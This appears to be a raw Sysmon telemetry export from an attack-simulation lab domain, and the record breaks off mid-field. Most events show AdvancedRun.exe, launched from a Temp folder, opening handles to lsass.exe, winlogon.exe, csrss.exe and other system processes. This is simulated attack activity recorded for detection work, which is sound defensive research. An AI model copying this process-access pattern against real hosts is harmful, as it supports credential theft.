18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004016195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004016194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004016193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016191Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016188Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016187Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004016181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004016180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004016178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 